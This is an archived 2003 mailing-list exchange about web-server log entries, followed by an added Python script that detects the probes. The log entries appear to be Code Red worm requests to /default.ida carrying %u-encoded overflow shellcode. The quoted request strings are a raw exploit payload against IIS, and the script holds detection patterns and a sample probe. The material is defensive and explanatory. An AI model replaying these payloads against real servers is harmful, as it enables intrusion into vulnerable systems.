It's a trojan virus that tries to find any vulnerable IIS using random IPs. This in itself is not a dangerous attack (of course, if you have an IIS around, it is); indeed, it is not intended to be for you.

"Konstantin Filtschew" <[EMAIL PROTECTED]> writes:

> hi,
>
> found this in my /var/log/apache/access.log, what does that mean:
>
> 217.37.212.241 - - [04/May/2003:15:17:22 +0200] "GET
> /default.ida?XXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
> 9090
> %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
> 00%u
> 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"
> 217.128.213.22 - - [04/May/2003:14:50:16 +0200] "GET
> /default.ida?XXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
> 9090
> %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
> 00%u
> 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"
> 217.218.66.141 - - [04/May/2003:13:39:56 +0200] "GET
> /default.ida?XXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
> 9090
> %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
> 00%u
> 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"
> 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET
> /.hash=680d6f5c4d584f6b5d941a
> f136938db3751a840b HTTP/1.1" 404 324 "-" "-"
> 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET
> /.hash=e175a0da67b1fefbb5acd8
> cdc7ccc516ede015d1 HTTP/1.1" 404 324 "-" "-"
> 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET
> /.hash=8c10ba0aae81edb7ae51eb
> 156b2fcb770b66864a HTTP/1.1" 404 324 "-" "-"
>
> thx for help
>
> Konstantin Filtschew

--
Andres Roldan, CSO Fluidsignal Group
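
An added example, not part of the original thread: a Python sketch that scans Apache access-log lines for the `default.ida` probe pattern quoted above and groups hits by source address, keeping the response status so you can confirm the server answered 404. The sample lines, the documentation-range addresses and the thresholds (a 64-character padding run, four `%u` escapes) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common/combined log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)
IDA_RE = re.compile(r'\.id[aq]\?', re.IGNORECASE)   # .ida/.idq are IIS script mappings
PADDING_RE = re.compile(r'(.)\1{63,}')              # 64+ repeats of one character
UESC_RE = re.compile(r'%u[0-9a-fA-F]{4}')           # IIS-style %uXXXX escapes

def classify(uri):
    """Return the indicators found in one request URI."""
    hits = []
    if IDA_RE.search(uri):
        hits.append("ida-target")
    if PADDING_RE.search(uri):
        hits.append("padding")
    if len(UESC_RE.findall(uri)) >= 4:
        hits.append("u-escapes")
    return hits

def scan(lines):
    """Map source IP -> [(time, status, indicators)] for probe-like requests."""
    found = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # wrapped or malformed line: skip rather than guess
        hits = classify(m.group("uri"))
        # Require the .ida/.idq target plus at least one payload indicator.
        if "ida-target" in hits and len(hits) >= 2:
            found[m.group("ip")].append((m.group("time"), int(m.group("status")), hits))
    return dict(found)

# Constructed sample lines (documentation IP ranges, shortened payload).
PROBE = "/default.ida?" + "X" * 224 + "%u9090" * 4 + "=a"
SAMPLE = [
    f'192.0.2.10 - - [04/May/2003:15:17:22 +0200] "GET {PROBE} HTTP/1.0" 404 277 "-" "-"',
    '192.0.2.20 - - [04/May/2003:15:18:01 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
    f'198.51.100.7 - - [04/May/2003:14:50:16 +0200] "GET {PROBE} HTTP/1.0" 404 277 "-" "-"',
    '192.0.2.20 - - [04/May/2003:15:19:40 +0200] "GET /search?q=' + "a" * 80 + ' HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in scan(SAMPLE).items():
        for when, status, hits in events:
            print(f"{ip} {when} status={status} indicators={','.join(hits)}")
```

A status other than 404 on a flagged line is the case worth a closer look, since it means something on the host actually answered the `.ida` request.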

